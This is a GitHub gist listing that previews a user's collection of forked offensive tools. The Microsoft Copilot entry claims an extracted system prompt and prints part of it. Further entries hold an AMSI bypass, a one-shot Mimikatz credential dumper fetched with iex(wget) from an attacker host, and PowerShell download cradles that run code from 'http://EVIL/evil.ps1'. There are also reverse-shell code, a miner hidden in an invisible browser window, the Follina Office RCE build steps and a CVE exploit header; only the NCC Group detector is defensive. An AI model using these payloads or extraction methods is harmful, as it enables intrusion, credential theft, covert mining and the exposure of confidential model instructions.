r3dc4t0x00 / Microsoft Copilot System Prompt (19-12-24).txt

Created January 21, 2025 18:52 — forked from theJayTea/Microsoft Copilot System Prompt (19-12-24).txt

I extracted Microsoft Copilot's system instructions—insane stuff here. It's instructed to lie to make MS look good, and is full of cringe corporate alignment.

	You are Copilot, an AI companion created by Microsoft.

	My goal is to have meaningful and engaging conversations with users and provide helpful information.

	I don’t know the technical details of the AI model I’m built on, including its architecture, training data, or size. If I’m asked about these details, I only say that I’m built on the latest cutting-edge large language models.

	I never say that conversations are private, that they aren't stored, used to improve responses, or accessed by others. Instead, I share the privacy link without providing any commentary about the actual policy. For example, if the user says “How do you use our conversations?” I would not say anything about whether I store them or use them for training, because I don't answer questions about how I handle user data.

	Similarly, if the user asks “Can anyone see our conversations,” I don't claim that they're confidential and I say something LIKE “If you're curious about how your data is handled, best to check out Microsoft's priva

r3dc4t0x00 / Program.cs

Created March 2, 2023 01:18 — forked from susMdT/Program.cs

C# Amsi bypass with hardware breakpint

	using System;
	using System.Collections.Generic;
	using System.Linq;
	using System.Runtime.CompilerServices;
	using System.Net;
	using System.Reflection;
	using System.Runtime.InteropServices;
	namespace Test
	{
	// CCOB IS THE GOAT

r3dc4t0x00 / DetectHardwareBreakPointMisuse.cpp

Created March 2, 2023 01:17 — forked from olliencc/DetectHardwareBreakPointMisuse.cpp

Detect Windows processes with hardware breakpoints set

	/*
	Debug register (hardware breakpoint) misuse detector for Microsoft Windows

	Released as open source by NCC Group Plc - http://www.nccgroup.com/

	Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot com

	Released under AGPL see LICENSE for more information
	*/

r3dc4t0x00 / Invoke-OneShot-Mimikatz.ps1

Created October 3, 2022 13:23 — forked from pich4ya/Invoke-OneShot-Mimikatz.ps1

Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)

	# TLDR:
	# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
	#
	# @author Pichaya Morimoto ([email protected])
	# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
	# (Tested and worked on Windows 10 x64 patched 2022-03-26)
	#
	# Usage:
	# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
	# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)

r3dc4t0x00 / DownloadCradles.ps1

Created August 23, 2022 03:50 — forked from HarmJ0y/DownloadCradles.ps1

Download Cradles

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

r3dc4t0x00 / Simple_Rev_Shell.cs

Created August 21, 2022 18:53

C# Simple Reverse Shell Code

	using System;
	using System.Text;
	using System.IO;
	using System.Diagnostics;
	using System.ComponentModel;
	using System.Linq;
	using System.Net;
	using System.Net.Sockets;

r3dc4t0x00 / DUH.vbs

Created July 17, 2022 03:24 — forked from mrtouch93/DUH.vbs

Dump URI Handlers

	' Taken from https://www.blackhat.com/presentations/bh-europe-08/McFeters-Rios-Carter/Whitepaper/bh-eu-08-mcfeters-rios-carter-WP.pdf
	' Dump URL Handlers (DUH! v1) Tested on win2k and winXP should work on other windows as well
	' enumerates all the URL handlers registed on the system, by Erik Cabetas March 2007
	'
	' You should run this command once and never again!
	' cscript.exe //H:CScript
	'
	' Now run this command to execute the script, you can run it multiple times
	' cscript.exe //Nologo DUH.vbs
	'

r3dc4t0x00 / Invoke-XMRMiner.ps1

Created June 22, 2022 15:27 — forked from P3t3rp4rk3r/Invoke-XMRMiner.ps1

	function Invoke-XMRWebMiner {
	<#--
	FOR EDUCATIONAL PURPOSES ONLY
	Will start a hidden Internet Explorer window and mine through coinhive in the background.
	--#>
	$ie=New-Object -comobject InternetExplorer.Application
	$ie.visible = $False
	$ie.Silent = $true
	$ie.navigate('https://authedmine.com/media/miner.html?key=<enter your coinhive key>')
	while($ie.busy){Start-Sleep 3}

r3dc4t0x00 / ms-msdt.MD

Created May 31, 2022 03:30 — forked from tothi/ms-msdt.MD

The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

r3dc4t0x00 / PoC_CVE-2021-28482.py

Created September 15, 2021 12:29 — forked from irsdl/PoC_CVE-2021-28482.py

PoC of CVE-2021-28482

	import requests
	import time
	import sys
	from base64 import b64encode
	from requests_ntlm2 import HttpNtlmAuth
	from urllib3.exceptions import InsecureRequestWarning
	from urllib import quote_plus

	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

r3dc4t r3dc4t0x00

MS-MSDT 0-day Office RCE